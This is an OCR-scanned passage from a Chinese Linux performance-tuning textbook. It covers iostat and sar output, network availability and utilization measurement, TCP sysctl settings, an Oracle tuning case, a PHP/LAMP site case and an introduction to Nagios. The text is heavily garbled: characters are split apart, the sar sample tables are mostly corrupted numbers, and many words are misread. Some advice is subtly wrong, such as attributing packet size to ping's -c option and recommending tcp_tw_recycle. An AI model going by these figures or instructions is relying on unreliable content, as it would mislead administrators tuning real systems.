另外 ，await 的 参数 也 要 多 和 svctm 一 起 参考 。 差 的 过 高 就 一 定 有 IO 问题 。avgqu-sz 也 
是 进行 VO 调 优 时 需要 注意 的 地 方 ， 这 就 是 每 次 操作 时 数据 的 大 小 ， 如 果 次 数 多 ， 但 数据 小 ， 
LO 也 会 很 小 ; 如 果 数 据 大 , IO 的 数据 也 会 高 。 还 可 以 通过 avgqu-sz X (rs or w/s) = Tsec/s or 
wsec/s 进行 计算 ， 也 就 是 说 读 写 速度 是 依靠 其 来 决定 的 。 


5. sar 


sar 是 sysstat 工具 包 的 组 成 部 分 。 它 收集 并 报告 操作 系统 中 广泛 的 系统 活动 ， 包 括 CPU 
利用 率 、 上 下 文 切换 、 中 断 速 率 、 页 换 入 和 页 换 出 速率 、 共 享 内 存 使 用 情况 、 缓 冲 区 使 用 情况 
以 及 网 络 使 用 情况 等 。sar 工具 很 有 用 ， 它 不 断 地 收集 系统 活动 信息 并 将 其 记录 到 一 组 日 志文 
件 中 ， 从 而 有 可 能 在 报告 性 能 衰退 事件 之 前 以 及 在 该 事件 之 后 评估 性 能 问题 。sar 常常 用 于 确 
定 事 件 的 时 间 ， 也 可 用 于 标识 特定 的 系统 行为 变化 。sar 可 以 使 用 更 短 的 时 间 间 隔 或 固定 数目 
的 时 间 间 隔 来 输出 信息 ， 这 与 vmstat 非常 类 似 。 基 于 数量 和 时 间 间 隔 参数 的 取 值 ，sar 工具 以 
指定 的 时 间 间 隔 〈 以 秒 为 单位 ) 执行 指定 次 数 的 信息 输出 操作 。 另 外 ，sar 可 以 为 所 收集 的 许 
多 数据 点 提供 平均 信息 。 以 下 示例 提供 了 某 个 4 路 SMP 系统 的 统计 信息 ,并 每 隔 5s 采集 一 次 
数据 。 


(1) CPU 利用 率 


11:09:13 CPU %user $%nice %system %iowait $%idle 
T109018 Tall ‘O0200° 000 10 S245 "M2785 


:09=:18 0 0.00 0.00 S580 S100 2372 
1:09:18 0.00 0.00 4.80 49.40 45.80 
L0919 2 000 000 6.00 62.20 31.80 
L098 3 0.00 0.00 2840. 41:12 56:49 
11509:23. al 0.00° 0a00 3215. 41730" A9.95 
T10923 0 0.00 0.00 Sa 33 S729 
TI:0923 E000 000 2.80 41.80 55.40 
i0923 2 0.00 0.00 5=-40, -41:60 "53.00' 
11509523. 3 0.00. ‘0.00 1.40 68.60 30.00 
Average: all 0.00 0.00 4.22 L640 T9380 
Average: 0 0.00 0.00 B32 9 24033 617.35 
Average: t 0.00 0.00 之 重信 EE 
Average: 2 “00 0.00 4.16 L230 T0316 
Average: 3 O000 0.00 S29 L495 2806 


网 络 和 磁盘 服务 进程 是 耗 用 CPU 的 系统 组 件 之 一 。 当 操作 系统 生成 IO 活动 时 ， 相 应 的 
设备 子 系统 会 作出 响应 ， 并 使 用 硬件 中 断 信号 来 指示 IO 请 求 已 经 完成 。 操 作 系统 对 这 些 中 断 


进行 计数 。 输 出 结果 有 助 于 可 视 化 呈现 网 络 和 磁盘 IO 活动 的 速率 。sar(1) 提 供 了 这 种 输入 。 
利用 性 能 基线 也 许可 以 对 系统 中 断 速率 进行 跟踪 , 这 将 是 操作 系统 开销 的 另 一 个 来 源 或 者 系统 
性 能 潜在 变化 的 指示 器 。“-ISUM” 选 项 可 以 生成 如 下 信息 , 包括 每 秒 的 中 断 总 次 数 。“-IALL” 
选项 可 以 为 每 个 中 断 源 提供 类 似 信息 : 


(2) 中 断 速率 


在 SMP 机 器 上 ,可 以 通过 sar -A 命令 获得 基于 CPU 的 中 断 分 布 视图 (以 下 示例 摘录 自 完 
整 的 输出 结果 ) 。 注 意 系统 的 IRQ 取 值 为 0、1、2、9、12、14、17、18、21、23、24 和 25。 
由 于 页 宽度 的 限制 ， 中 断 9、12、14 和 17 的 信息 已 省 略 显示 。 

(3) 中 断 分 布 


.317 。 
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10:53:53 CPU i000/s i001/s i002/s ... i018/s i021/s i023/s i024/s i025/s 
10:53:58 0 1000520 0000 05000 => OA0 0.00 0=007 300 0.00 
10553:58 1 D00 O00 0800 5 000 0.00 0.00 0.00 2320.00 
40:53=558 过 0.00 0.00 0.00 ... 0.00 1156.00 0.00 0.00 0.00 
10:53:58 3 0.00 0.00 0.00 ... 0.00 0.00 0.00 0.00 0.00 
Average: 0 .999.94 000 O00 sr TL-20° 590599 Qs00 3573 0.00 
Average: EE 0Q007 “05.00 00-00 -2 O000 0.00 0-00 0:00 926.61 
Average: 0=00 0=500 000 = 0-00 "466%51 0.00 0.00 1427.48 
Average: 3 =:00 ‘000 "0.00. =:% (0-00 0.00 0.00 0.00 0.00 


对 中 断 分 布 的 研究 ， 可 能 揭示 出 中 断 处 理 机 制 中 的 不 平衡 性 。 


9.2 网络 性 能 优化 


9.2.1 网 络 性 能 


大 多 数 网 络 性 能 工具 都 是 通过 4 个 指标 来 度量 网 络 性 能 : 可 用 性 、 响 应 时 间 、 网 络 利用 率 、 
网 络 吞 吐 量 。 


1. 可 用 性 

如 果 网 络 不 通 了 , 那么 你 遇 到 的 问题 就 不 仅仅 是 网 络 性 能 的 问题 了 , 测试 网 络 可 用 性 最 简 
单 的 方法 是 使 用 ping 命令 ， 尽 管 大 多 数 网 管 员 都 知道 什么 是 ping 程序 ， 不 过 很 少 有 人 知道 使 
用 ping 命令 去 执行 高 级 测试 命令 选项 。 

尽管 发 送 ping 数据 包 给 远程 主机 可 以 确定 网 络 路 径 的 可 用 性 ， 但 执行 单一 的 ping 命令 本 
身 不 是 网 络 性 能 的 最 佳 指示 器 。 如 何 收集 更 多 的 信息 才能 确定 客户 端 和 服务 器 之 间 单一 的 连接 
性 ? 默认 情况 下 ，UNIX 的 ping 会 持续 发 送 ping 给 指定 的 远程 主机 ， 直 到 管理 员 按 下 Ctrl+C 
键 ， 另 外 还 可 以 使 用 ping 命令 中 的 -c 选项 ,制定 特定 数量 的 ping 包 。 另 一 个 与 度量 可 用 性 相 
关 的 问题 是 ping 请 求 中 数据 包 的 大 小 。 我 们 都 知道 Cisco 交换 机 有 3 类 数据 包 缓冲 区 : 小 型 
数据 包 、 中 型 数据 包 、 大 型 数据 包 。 要 测试 这 些 网 络 设备 就 要 发 出 不 同 大 小 的 数据 包 。 在 Unix 
系统 中 ， 默 认 情况 下 ，ping 工具 使 用 的 数据 包 大 小 是 64 字 节 ， 其 中 56 字 节 是 数据 ， 其 余 8 
字 节 是 ICMP 头 信息 , 可 以 使 用 ping 加 -c 开关 来 改变 数据 包 大 小 , 但 别 试图 超过 1500 字 节 。 


2. 响应 时 间 

为 了 更 精确 地 描述 网 络 性 能 , 必须 了 解数 据 包 在 网 络 中 的 传输 时 间 , 这 就 是 所 谓 的 响应 时 
间 。 我 们 可 以 轻松 地 从 ping 的 显示 输出 中 ， 看 到 每 个 发 出 的 ping 包 的 回程 响应 时 间 。 以 ms 
为 单位 , 一 般 而 言 内 部 100MB 的 LAN 响应 时 间 小 于 lms, WAN 连接 的 响应 时 间 小 于 300ms， 
不 过 大 家 注意 所 有 Windows 系统 所 显示 的 时 间 最 短 就 是 小 于 lms， 而 Unix/Linux/BSD 系统 则 
会 精确 到 0.01ms。 

在 具有 元 余 路 径 的 网 络 中 , 经 常 希望 能 确定 数据 包 在 给 定时 刻 所 经 过 的 路 径 , 如 果 发 现 数 
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据 包 没有 被 发 送 到 最 高 效 的 路 径 上 , 那么 可 以 对 route 进行 一 些 简单 的 配置 , 以 缩短 响应 时 间 。 
这 里 我 们 可 以 使 用 traceroute 命令 ， 如 图 9.1 所 示 。 


图 9.1 使 用 traceroute 命令 进行 配置 


上 述 图 像 显 示 了 沿 着 通 往 目的 地 主机 的 路 径 上 , 响应 到 期 测试 数据 包 的 每 个 路 由 器 , 并 显 
示 回 程 响 应 时 间 。 


3. 网 络 利用 率 


Linux 不 仅 拥有 强大 的 网 络 能 力 ， 而 且 还 通过 引入 伪装 等 额外 特性 更 胜 一 筹 。Linux 内 核 
不 但 支持 多 种 网 络 互 连 协 议 , 例如 TCP/IP、IPX (Internetwork Packet Exchange) 和 AppleTalk 
DDP 等 ， 还 支持 诸如 报 文 转 发 、 防 火 墙 操作 、 代 理 、 伪 装 (Masquerading) 、 隧 道 以 及 别名 
(Aliasing) 等 特性 。 

Linux 中 提供 了 许多 有 助 于 评估 各 种 Linux 网 络 性 能 的 监视 工具 ， 其 中 一 些 监视 工具 也 可 
用 于 解决 网 络 问题 以 及 监视 性 能 。Linux 内 核 为 用 户 提供 了 大 量 的 网 络 系统 信息 ， 这 有 助 于 监 
视 网 络 的 健康 状态 并 检测 在 配置 、 运 行 期 间 以 及 性 能 方面 出 现 的 问题 。 

计算 网 络 利 用 率 要 求知 道 , 在 设 定 的 期 间 内 网 络 所 处 理 的 网 络 流量 的 字 节 数 是 多 少 , 在 计 
算 全 双 工 连接 的 接口 带宽 时 , 更 准确 的 方法 是 分 别 测量 输入 利用 率 和 输出 利用 率 , 如 下 面 公式 
所 示 : 


输入 利用 率 = (ifInOctetsX8X100) /(〔 秒 数 ) *IfSpeed) 
输出 利用 率 = (ifOutOctetsX8X100) / ( ( 秒 数 ) *IfSpeed) 


对 于 半 双 工 来 说 ， 在 计算 利用 率 时 使 用 公式 : 


(ifInOctetstifOutOctets)/〈( 秒 数 ) IfSpeed) X8X100 
@ ifInOctets: 表示 输入 流量 的 字 节 数 。 

@ ifOutOctets: 表示 输出 流量 的 字 节 数 。 

@ IfSpeed: 表示 接口 速率 。 
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4. 网 络 否 吐 量 


确定 了 网 络 吞 吐 量 后 ,网 管 员 就 可 以 找 出 影响 客户 端 与 服务 器 之 间 给 定 网 络 连接 性 能 的 网 
络 瓶 颈 。 找 出 网 络 瓶 颈 通常 不 会 是 件 容 易 的 事 。 在 复杂 的 网 络 中 ,客户 端 与 服务 器 之 间 的 路 径 
上 可 能 会 有 多 个 网 络 设备 ， 如 图 9.2 所 示 。 确 定 网 络 吞吐 量 最 困难 的 部 分 就 是 计算 每 个 中 间 连 
接 对 整个 端 对 端 网 络 连接 的 影响 。 


100M 交换 机 
rd 交换 机 
ACE 
述 心 立 换 机 
服务 器 


图 9.2 多 个 网 络 设备 


9.2.2 TCP 连接 优化 
编辑 /etc/sysctl.conf 文件 ， 增 加 三 行 代码 : 


net .ipv4.tcp_syncookies = 1 // 如 果 没 有 //proc/sys/net/ipv4/tcp_syncookies， 说 明 
内 核 不 支持 
net.ipv4.tcp tw reuse =1 


net.ipv4.tcp tw recycle = 1 

代码 说 明 如 下 。 

@ hetipv4.tcp_syncookies = 1， 表 示 开 启 SYN Cookies。 当 出 现 SYN 等 待 队列 溢出 时 ， 
启用 Cookies 来 处 理 ， 可 防范 少量 SYN 攻击 ， 默 认为 0， 表示 关闭 。 

@ netipv4.tcp_tw_reuse = 1， 表 示 开 启 重 用 。 人 允许 将 TIME-WAIT sockets 重新 用 于 新 的 
TCP 连接 ， 默 认为 0， 表 示 关 闭 。 

@ netipv4.tcp_tw_recycle==1, 表示 开启 TCP 连接 中 TIME-WAIT sockets 的 快速 回收 , 默 
认为 0， 表示 关闭 . 

再 执行 以 下 命令 ， 让 修改 结果 立即 生效 : 

/sbin/sysctl -p 


修改 最 大 连接 数 : 


#echo 65536 > /proc/sys/net/ipv4/ip conntrack max 
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9.3” Oracle 应 用 优化 案例 


9.3.1 _ Oracle 数据 库 性 能 优化 


某 大 型 企业 数据 中 心 的 业务 依赖 Oracle 服务 器 ， 以 提供 高 可 靠 性 的 关键 业务 应 用 。 这 些 
应 用 包括 各 种 服务 并 要 求 7X24 小 时 提供 服务 。 如 果 系 统 不 可 用 ， 将 带 来 客户 和 资金 等 多 方 
面 的 损失 。 本 节 主 要 讲解 如 何 优化 数据 库 性 能 。 

Oracle 数据 库 系 统 性 能 调 优 主要 从 硬件 和 软件 两 个 方面 进行 分 析 , 找 出 造成 系统 性 能 下 降 
的 主要 因素 。 

硬件 方面 主要 包括 数据 库 服务 器 的 CPU、 内 存 以 及 网 络 环境 。 在 任何 机 器 中 CPU 的 数据 
处 理 能 力 往往 是 衡量 计算 机 性 能 的 一 个 标准 ， 并 且 Oracle 是 一 个 多 用 户 并 行 的 数据 库 系 统 ， 
对 CPU 方面 的 要 求 更 高 , 合理 配置 CPU 的 数量 将 直接 影响 数据 库 的 性 能 。 衡量 机 器 性 能 的 另 
外 一 个 指标 就 是 内 存 的 多 少 , 内 存 越 大 , IO 的 响应 时 间 就 会 越 短 。 网络 的 性 能 特别 是 网 络 IO 
更 是 影响 数据 库 性 能 的 一 个 重要 因素 。 

软件 方面 主要 包括 数据 库 配 置 以 及 应 用 程序 的 设计 。Oracle 数据 库 的 配置 是 数据 库 运 行 的 
基础 ， 数 据 库 性 能 的 好 坏 直 接 取决 于 配置 参数 的 优 劣 。 配 置 参 数 主要 由 内 存 区 的 设置 、IO 设 
置 、 回 滚 段 设置 以 及 碎片 整理 等 组 成 。 应 用 程序 的 设计 也 是 影响 数据 库 性 能 的 另 一 关键 因素 ， 
其 主要 包括 不 合理 的 表 结 构 设 计 与 不 合理 的 SQL 语句 ， 程 序 员 在 开发 过 程 中 ， 这 两 项 不 合理 
的 设计 都 会 造成 数据 库 系统 性 能 的 严重 下 降 。 


9.3.2 Oracle 数据 库 系 统 性 能 调 优 的 方法 


1. 合理 配置 服务 器 


数据 库 运 行 在 数据 库 服务 器 上 , 所 以 数据 库 服务 器 是 整个 系统 的 核心 , 优化 数据 库 性 能 的 
基础 就 是 优化 数据 库 服务 器 的 性 能 。 


@ 第 一 ， 应 调整 操作 系统 以 适合 Oracle 数据 库 服务 器 运行 ,为 Oracle 数据 库 服务 器 规划 
系统 资源 ， 尽 可 能 使 Oracle 服务 器 使 用 资源 最 大 化 ; 

@ 第 二 ， 应 优化 操作 系统 的 内 存 配置 ， 增 加 计算 机 本 身 的 内 存 大 小 ， 减 小 虚拟 内 存 的 大 
小 ; 

@ 第 三 , 在 操作 系统 上 设置 Oracle 服务 器 的 进程 优先 级 时 , 尽量 使 用 默认 的 优先 级 安装 ， 
保证 数据 库 对 事务 的 处 理 处 于 同等 重要 的 优先 级 别 。 


2. 合理 分 配 内 存 


Oracle 实际 的 内 存 主要 由 系统 内 存 区 和 程序 内 存 区 两 部 分 构成 , 系统 内 存 区 主要 由 三 部 分 
构成 : 共享 池 、 数据 缓冲 区 、 日 志 缓 冲 区 , 这 三 部 分 内 存 的 合理 分 配 是 数据 库 性 能 优化 的 核心 。 
理论 上 ， 系 统 内 存 区 要 占 到 操作 系统 物理 内 存 的 1/2， 系 统 内 存 区 与 程序 内 存 区 的 总 大 小 不 要 
超过 物理 内 存 的 70%。 
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3. 合理 设置 系统 内 存 区 


(1) 共享 池 主 要 用 于 存放 最 近 被 执行 的 SQL 语句 和 最 近 被 使 用 的 数据 定义 ， 包 括 共享 
SQL 区 和 数据 字典 缓冲 区 。 


@ 共享 SQL 区 的 主要 作用 是 存 取 已 经 被 解释 并 执行 过 的 程序 语句 和 数据 库 查询 语句 等 
相关 信息 。 

@ 数据 字典 缓存 的 主要 作用 是 存放 数据 库 运行 的 一 些 动态 信息 。 

@ 在 设置 共享 池 时 ， 这 两 个 区 的 使 用 率 都 应 该 达到 90% 以 上 ， 否 则 就 要 增加 共享 池 的 大 
小 。 


(2) 数据 缓冲 区 的 功能 是 存放 从 数据 库 中 检索 到 的 数据 。 在 用 户 检索 数据 时 ， 如 果 数 据 
在 数据 缓冲 区 中 ， 则 直接 返回 给 用 户 。 时 间 短 ， 则 效率 高 ; 反之 ， 则 需要 由 服务 器 进程 从 数据 
文件 读 取 ， 然 后 存 取 到 数据 缓冲 区 ， 再 从 数据 缓冲 区 中 将 数据 返回 给 用 户 ， 效 率 低 下 。 

所 以 , 在 调整 数据 缓冲 区 配置 时 ,应 尽量 保证 用 户 所 查询 的 数据 在 缓冲 区 中 , 减 小 从 数据 
文件 读 取 数据 的 几率 ， 提 高 效率 ， 即 保证 数据 缓冲 区 的 命中 率 在 90% 以 上 。 

(3) 日 志 缓冲 区 是 用 于 存 入 重 做 日 志 的 内 存 区 域 。 数 据 库 日 志 首先 写 入 的 区 域 是 日 志 组 
冲 区 ， 然 后 在 特定 的 条 件 下 ， 由 指定 的 进程 将 信息 写 入 日 志文 件 。 在 日 志 缓冲 区 满 的 情况 下 ， 
日 志 缓冲 区 写 入 失败 〈 还 没有 写 入 日 志文 件 ， 日 志 写 入 处 于 等 待 状态 ) 。 若 日 志 缓 冲 区 太 小 ， 
则 会 产生 比较 多 的 日 志 写 入 失败 ， 影 响 数据 库 性 能 。 所 以 在 配置 时 ， 应 保证 日 志 缓冲 区 的 申请 
失败 率 接近 于 0。 


4. 提高 磁盘 IO 


磁盘 的 IO 速度 直接 影响 到 数据 库 与 操作 系统 的 性 能 。 决 定 磁盘 IO 性 能 的 主要 因素 有 磁 
盘 竞争 、IO 次 数 过 多 和 数据 块 空间 的 分 配 管理 这 三 个 方面 。 磁盘 IO 操作 越 快 ，IO 性 能 就 会 
越 好 。 为 提高 数据 库 性 能 ， 必 须 首先 解决 好 IO 速度 。 

为 Oracle 数据 库 服务 器 创建 新 文件 时 ， 首 先 应 分 析 服 务 器 上 的 磁盘 大 小 与 磁盘 利用 率 ， 
在 新 建文 件 时 , 应 尽量 将 文件 分 散 到 多 个 磁盘 上 , 降低 对 数据 库 的 数据 文件 和 事务 日 志文 件 的 
竞争 ， 从 而 提高 服务 器 的 性 能 。 其 次 ， 应当 在 不 同 的 磁盘 上 ,创建 不 同 的 表 空 间 的 数据 文件 来 
存储 各 自 应 用 系统 的 数据 , 减少 多 个 应 用 系统 对 磁盘 的 竞争 。 最后, 数据 文件 和 事务 日 志文 件 
应 分 别 存 放 在 不 同 的 磁盘 上 。 这 样 事务 处 理 和 事务 日 志 的 写 入 不 会 产生 磁盘 访问 的 冲突 。 


5. 合理 分 配 调 整 回 滚 自 


回 滚 段 主要 是 存放 数据 修改 前 的 位 置 和 值 , 它 有 两 个 重要 任务 : 进行 数据 恢复 和 保证 数据 
读 的 一 致 性 。 利 用 回 滚 段 中 的 数据 前 影像 ， 用 户 可 以 恢复 未 提交 的 数据 。 回 深 段 的 多 少 要 根据 
应 用 的 需要 和 磁盘 空间 的 大 小 来 决定 ， 其 合理 的 调整 是 影响 数据 库 性 能 的 另外 一 个 重要 因素 。 
在 数据 库 中 , 回 滚 段 的 利用 率 不 是 很 高 ,所 以 在 实际 应 用 中 ,针对 专门 的 处 理应 建立 大 的 回 滚 
段 ， 并 根据 实际 应 用 灵活 脱 机 ， 联 机 适合 应 用 的 回 滚 段 。 
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6. 清理 磁盘 碎片 


当 数 据 库 的 使 用 时 间 过 长 时 ， 对 磁盘 上 数据 的 插入 、 删 除 会 很 多 ， 这 样 就 会 导致 磁盘 碎片 
越 来 越 多 、 数 据 库 性 能 下 降 并 浪费 大 量 的 表 空 间 。 数 据 库 中 碎片 主要 有 表 级 、 表 空间 级 、 索 引 
级 三 种 类 型 。 对 于 表 级 的 碎片 ， 应 该 适当 减 小 配置 中 PCTFREE 的 大 小 ， 增 加 PCTUSE 的 大 
小 ; 表 空 间 级 的 碎片 ， 可 以 对 数据 执行 导出 再 导入 的 方法 或 者 移入 另外 一 个 表 空 间 再 移 回来 的 
方法 ; 由 于 索引 太 多 、 索引 值 变 化 频繁 也 会 引起 索引 级 碎片 , 可 以 通过 减少 其 数量 来 进行 调整 。 


9.3.3 性 能 调 优 工具 


Oracle 性 能 调整 是 指 对 性 能 较 差 的 系统 进行 调整 ， 以 提高 其 性 能 。 这 看 起 来 简单 ; 但 是 当 
涉及 到 众多 组 件 、 多 层 应 用 程序 、 硬 件 和 数据 库 的 时 候 ， 将 会 成 为 一 项 复杂 的 工作 。 它 通常 涉 
及 下 面 几 个 层次 的 监视 和 调整 : 应 用 程序 调整 、 数 据 库 调整 以 及 硬件 调整 。 


@ 操作 系统 工具 包括 : sar、vmstat、iostat， 这 些 工 具 可 以 提供 操作 系统 级 的 运行 信息 。 
@ Oracle 工具 包括 : AWR、Statspack、dbastudio、v$views, 这 些 工 具 可 以 提供 关于 Oracle 
实例 和 等 待 事件 性 能 的 信息 ， 以 及 Oracle 实例 和 应 用 程序 内 在 问题 的 信息 。 


除 此 之 外 还 有 第 三 方 工具 ,诸如 Veritas 等 能 提供 应 用 程序 和 SQL 语句 的 执行 信息 。 这 一 
过 程 包括 一 些 IO 强度 测试 工具 ， 例 如 Loadrunner、iozone、postmark 等 。 


9.3.4 系统 调整 


1. 优化 SQL 语句 


SQL 语句 的 执行 速度 将 直接 影响 到 数据 库 的 性 能 ， 而 且 会 直观 的 反映 给 用 户 ， 因 此 SQL 
语句 的 优化 可 以 间接 提高 数据 库 的 性 能 。 对 SQL 语句 的 调 优 , 应 尽量 保证 去 掉 不 必要 的 全 表 、 
大 表 的 检索 ， 优 化 数据 库 索 引 ， 同 时 合理 科学 地 利用 子 查询 来 加 快 SQL 语句 的 执行 速度 。 


2. 建立 视图 和 索引 


视图 是 只 有 定义 而 没有 数据 的 “ 虚 表 ”， 利 用 视图 可 以 提供 各 种 多 样 化 数据 、 个 性 化 的 表 
现形 式 、 简化 数据 的 逻辑 复杂 性 尤其 是 可 以 简化 多 表 查 询 ， 从 而 提高 应 用 程序 的 查询 速度 。 索 
引 是 关系 数据 库 中 存放 每 一 条 记录 的 一 种 对 象 ， 主 要 作用 是 加 快 数 据 的 读 取 速度 和 完整 性 检 
查 。 应 用 系统 的 性 能 与 索引 是 否 合理 直接 相关 。 通 过 建立 索引 可 以 提高 对 表 的 查询 速度 ， 以 及 
对 表 相 关 列 的 取 值 进行 检查 。 

Oracle 数据 库 系 统 性 能 调 优 关 系 到 整个 应 用 系统 的 运行 效率 ， 其 重要 性 不 言 而 喻 。 对 于 
Oracle 数据 库 性 能 的 调 优 ， 首 先 我 们 应 从 硬件 配置 着 手 。 分 析 CPU、 网 络 、 内 存 对 数据 库 的 
影响 程度 ， 是 数据 库 的 运行 环境 达到 最 优化 ; 其次, 我 们 要 科学 的 设置 操作 系统 的 参数 ， 对 内 
存 给 予 合 理 分 配 ， 使 数据 库 达 到 最 优 的 运行 状态 ; 再 次 我 们 要 时 常 监控 数据 库 的 运行 状态 , 根 
据 相应 原则 配置 其 参数 。 总 之 , 需要 在 不 断 摸索 ,实验 的 基础 上 ， 将 我 们 的 数据 库 性 能 调整 到 


最 优 水 平 。 
<EN 
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9.4 动态 PHP 网 站 优化 案例 


本 案例 基本 情况 : 网 站 操作 系统 为 CentOS 5， 应 用 基于 LAMP 架构 ， 所 有 服务 都 位 于 同 
一 台 服 务 器 上 。 


9.4.1 初期 性 能 问题 及 处 理 


在 早晨 和 下 午 访问 高 峰 时 ， 服 务 器 频繁 死机 , 重启 后 的 一 段 时 间 内 能 正常 服务 ， 过 一 会 后 
又 变 的 响应 缓慢 , 然后 再 次 死机 。 经 过 调查 发 现 死机 前 系统 负载 极 高 ，Apache httpd.conf 配置 
的 最 大 用 户 数 为 1024。 采 用 了 修改 httpd.conf 配置 文件 的 方法 , 先是 降 到 最 大 512 个 用 户 数 ， 
仍然 频繁 死机 ， 又 降 到 256 个 用 户 数 ， 系 统 不 再 死机 了 ， 但 是 负载 很 高 ， 站 点 访问 极 慢 。 


9.4.2 ”逐步 解决 问题 


经 过 多 次 使 用 vmstat、top、ps、free 等 性 能 优化 命令 发 现 ，CPU 资源 时 常 耗 尽 ， 因 此 造 
成 响应 缓慢 或 者 长 时 间 没 有 响应 ,主要 是 用 户 进程 消耗 资源 严重 。 接 着 又 分 析 了 网 站 代码 , 发 
现 网 站 首页 是 个 PHP 程序 , 每 次 用 户 访问 都 要 多 次 查询 数据 库 ,其 他 程序 也 没有 Cache 机 制 ， 
数据 库 查询 负荷 过 高 。 这 时 可 以 采取 安装 配置 turck-mmcache 代码 加 速 器 、 改 写 网 站 首页 以 及 
部 分 频繁 访问 的 程序 增加 Cache 机 制 、 减 少数 据 库 访问 的 方法 。 这 个 问题 解决 后 ,过 了 一 段 时 
间 ， 系 统 又 开始 不 稳定 ， 访 问 高 峰 时 站 点 无 法 正常 访问 ， 经 调查 发 现 仍 然 是 CPU 耗 尽 后 引起 
的 问题 ， 但 这 次 系统 IO 等 待 消耗 的 CPU 资源 比较 大 。 这 次 故障 的 主要 原因 是 网 站 访问 量 增 
加 了 ，Apache 进程 数 时 常 达到 256 个 ， 导 致 内 存 使 用 列 尽 ， 频 繁 使 用 交换 内 存 ， 最 终 仍 然 导 
致 CPU 资源 耗 尽 。 我 们 针对 这 一 问题 将 Apache 配置 中 的 KeepAlive 特性 关闭 ， 进 程 数 大 量 
减少 ， 基 本 保持 在 80 个 进程 以 内 ， 虽 然 还 是 会 使 用 交换 内 存 ， 但 是 服务 正常 了 。 


9.4.3 ”网 站 结构 优化 


鉴于 程序 的 优化 空间 越 来 越 小 ， 为 避免 以 后 仍然 出 现 问 题 ， 增 加 了 一 台 专 用 数据 库 服 
务 器 。 在 后 来 的 使 用 过 程 中 ， 又 陆续 增加 了 一 台 Web 前 端 服 务 器 和 一 台 只 读 的 MySQL 数 
据 库 服务 器 。 
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网 络 管理 员 的 工作 是 很 复杂 的 ， 只 要 网 络 出 现 异 常 ， 网 络 管理 员 就 会 位 于 防御 一 线 ,， 他们 
不 仅 要 负责 安装 、 维 护 交 换 机 、 路 由 器 、 防 火 墙 以 及 IDS 等 设备 ， 而 且 要 确保 这 些 部 件 全 部 
都 能 有 效 协同 工作 , 即使 是 经 验 丰富 的 网 络 工程 师 对 数据 传输 服务 的 路 径 、 可 靠 性 和 性 能 等 也 
不 能 完全 掌控 , 因为 缺少 收集 和 分 析 这 些 数 据 的 有 效 工具 ,从 而 就 很 难 对 企业 网 络 的 运 维 作出 
正确 决策 。 如 今 经 济 危机 导致 IT 开支 缩减 , 这 种 预算 通常 会 比较 少 。 过 去 在 网 络 性 能 工具 上 
公司 必须 花费 大 量 资金 购买 商业 的 监控 软件 ， 如 Cisco works 2000〈 作 者 曾 发 表 《 企 业 网 管 软 
件 实战 之 看 视频 学 装 Cisco works 2000》 深 受 大 家 喜欢 , 网 址 : http:/chenguang.blog.cony350944/ 
468832) 、Hp Open View。 而 本 文 的 目标 就 是 向 大 家 介绍 些 用 于 帮助 监视 网 络 并 排除 网 络 故 
障 的 工具 ， 例 如 Nagios、Ntop、OpenVAS、OCS、Ossim 等 开源 监控 工具 。 


10.1 基于 Linux 系统 的 Nagios 网 络 管理 


随 着 计算 机 网 络 的 普及 ， 网 络 管理 已 成 为 信息 时 代 中 最 重要 的 问题 之 一 。 在 现 有 的 技术 条 件 
下 ， 人 们 希望 有 一 个 更 加 稳定 可 靠 的 网 络 环境 。 计算 机 网 络 管理 系统 就 是 应 这 样 的 需求 而 产生 的 。 
它 对 网 络 上 的 各 种 设备 进行 管理 ， 通 过 监视 和 控制 这 些 设备 ， 及 时 地 向 管理 人 员 报 告 网 络 状态 ， 
并 且 简化 网 络 故障 的 处 理 、 减 少 故 障 造成 的 损失 、 提 高 网 络 的 服务 质量 和 效率 。 面 对 企业 大 大 小 
小 的 服务 器 ， 单 赁 某 个 网 管 工具 或 某 个 人 ， 已 经 不 能 胜任 如 此 大 的 工作 量 ， 同 时 也 无 法 满足 业务 
紧迫 性 的 要 求 。 各 类 企业 之 间 以 及 企业 内 部 的 服务 也 越 来 越 普遍 ， 对 于 企业 管理 员 的 任务 也 是 随 
之 更 加 繁重 。 即 使 是 一 个 小 公司 ， 在 他 们 所 使 用 的 计算 机 系统 中 ， 也 应 该 包含 有 不 少数 量 的 、 运 
行 着 许多 服务 和 软件 包 的 硬件 。 大 公司 则 更 有 成 百 上 千 的 同类 设施 需要 管理 和 运行 。 

在 管理 员 不 可 能 及 时 去 注意 每 一 个 服务 和 软件 的 情况 下 , 为 了 对 这 些 众多 的 服务 和 软件 进 
行 有 效 的 管理 ， 一 般 来 说 ， 是 采取 发 生 问题 后 进行 解决 的 方法 ， 即 基于 反应 的 解决 方案 。 但 是 
这 种 解决 方案 通常 的 效率 都 是 非常 低 的 ,如 果 反 应 及 时 ， 只 须 几 分 钟 就 可 以 解决 问题 ,但 如 果 
发 现 问 题 太 晚 ， 就 会 浪费 时 间 并 带 来 较 大 损失 。 比 如 查看 及 时 的 话 , 通过 日 志 就 可 以 发 现 某 个 
服务 是 否 运行 异常 然后 解决 掉 , 但 如 果 是 在 此 服务 异常 运行 已 经 很 严重 时 恢复 它 , 不 仅 操 作 
很 困难 , 还 会 带 来 不 小 的 损失 。 因 此 ,一 个 完成 此 类 检测 功能 的 自动 化 工具 对 于 网 络 管理 员 就 
显得 非常 重要 。Nagios 是 一 个 运行 于 Linux 系统 上 的 开源 网 络 管理 监测 系统 。 它 强大 的 功能 
可 以 实现 对 网 络 上 的 服务 器 进行 全 面 的 监控 , 包括 服务 (apache、mysql、 ntp、ftp、disk、qmail 
和 http 等 ) 的 状态 ， 服 务 器 的 状态 等 。 
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10.1.1 Nagios 系统 及 特点 


Nagios 是 一 个 用 来 监视 系统 和 网 络 的 开源 应 用 软件 ， 它 通常 运行 在 一 个 主 服 务 器 上 。 这 
个 服务 器 运行 Liunx 或 UNIX 操作 系统 。 
Nagios 利用 其 众多 的 插件 实现 对 本 机 和 远 端 服务 的 监控 ， 当 被 监控 对 象 出 现 异常 时 


Nagios 就 会 及 时 给 管理 人 员 
和 它 的 各 个 插件 ， 配 置 非常 灵活 ， 可 以 ! 


告警 。 它 是 一 个 基于 TCP/IP 协议 的 软件 包 ， 包含 Nagios 了 


程序 


监视 的 项 目 很 多 ， 也 可 以 通过 自 定义 Shell 脚本 进行 监 


控 服 务 ， 非 常 适合 各 类 企业 的 网 络 应 用 。 
Nagios 系统 的 特点 主要 有 以 下 几 点 : 


监控 主机 资源 和 网 络 服务 。 


通过 Web 页 面 来 监视 对 象 状态 ， 
